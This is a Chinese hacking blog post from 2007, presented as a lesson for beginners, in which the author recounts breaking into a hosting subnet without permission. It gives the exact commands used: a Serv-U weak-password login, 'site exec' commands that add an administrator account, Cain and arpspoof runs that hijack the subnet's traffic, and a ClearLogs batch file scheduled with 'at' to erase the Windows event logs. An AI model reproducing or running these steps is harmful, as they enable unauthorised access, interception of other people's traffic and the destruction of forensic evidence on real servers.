注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

网路游侠

www.youxia.org

 
 
 

日志

 
 

我的ARP经历同一网段站点全部沦陷  

2007-06-26 00:25:32|  分类: 07 黑客安全 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

文章来源:C.R.S.T

作者:消失再消失

QQ617595

EMAIL:dj104434497@163.com

个人站点:http://3800hk.cn/blog/djandsj/index.html
=====================================================================================
注:本文适合新人学习.
前几天看上了一个SF发布的站点,被在它同一网段上发现有个赌博站.
(我最讨厌赌博站,害人的站点)
之后我看了一下那个SF发布站,本来想从这个站入手,但是做了防注,之后我又下了它论坛的YXBBS程序.可惜..............还是没搞下.
无奈....
旁注? 用工具检测不出有任何站点绑定在上面只好拿出最后的手段ARP或者嗅探了...
用流光扫了一下和他同段的机器.发现大多都开了3389.
又搞到一个servu6.3弱口令的机器. 老方法看看有执行权限没.
进入CMD
输入用户:admin
密码:123456
cd c:
竟然ok ,看来有希望
继续
cd windows
cd system32
进入到system32目录了
用queto site exec net.exe user xiaoshi xiaoshi /add
添加用户
queto site exec net.exe localgroup administrators xiaoshi /add
提升权限
ok
提示250.
登陆3389..........
目的是和这个肉鸡相隔4个IP的站 这个肉鸡的D段为13   目标为9
装上4.7汉化版的cain.(因为比较方便不像ARPSNIFFER需要多开窗口,但是容易被发现)
扫了一下MAC地址,发现很多,基本上 255个IP都是.
开始嗅吧....等者我们的肉鸡上来,哈哈....
等了将近一个小时截取到RDP数据10个 都没获得密码,或许是因为没有登陆只是用连接了一下吧
后来我嗅了一晚上,什么都没搞到,http到搞到不少截取了一个有用的密码 但是是40位的....无奈.
今天早上起来,首先去看一下肉鸡丢了没,没丢..
之后上传了arpspoof.exe 因为这段有赌博站.欺骗它.
进入cmd输入
arpspoof XXX.XX.XX.1 XXX.XX.XX.XXX.41(赌博站的IP) 80 0 1(1为单项欺骗) /r job.txt
开始欺骗,发送爆文.
打开站点开了一下,成功.
给我的感觉这段所有的机器都没做防ARP处理.....所以全部沦陷..... (大多都不是什么正规的站,基本上以赌博,色情为主的站)
感觉这次闹的挺大,我没做任何的跳板与代理.直接进入肉鸡的.如果被XXX
那我的青春就VOVER了
清除日志....
用ClearLogs.exe传到肉鸡上(我先开始用了ASM写的工具,貌似不好用)
建立了一个批处理
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
我没上后门,所以只能用at命令了执行了
在CMD下输入at 8:40"C:\Documents and Settings\xiaoshi\桌面\clearlog\1.bat"
之后等到了8:38的时候我注销了用户 安全的退出.....

  评论这张
 
阅读(97)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017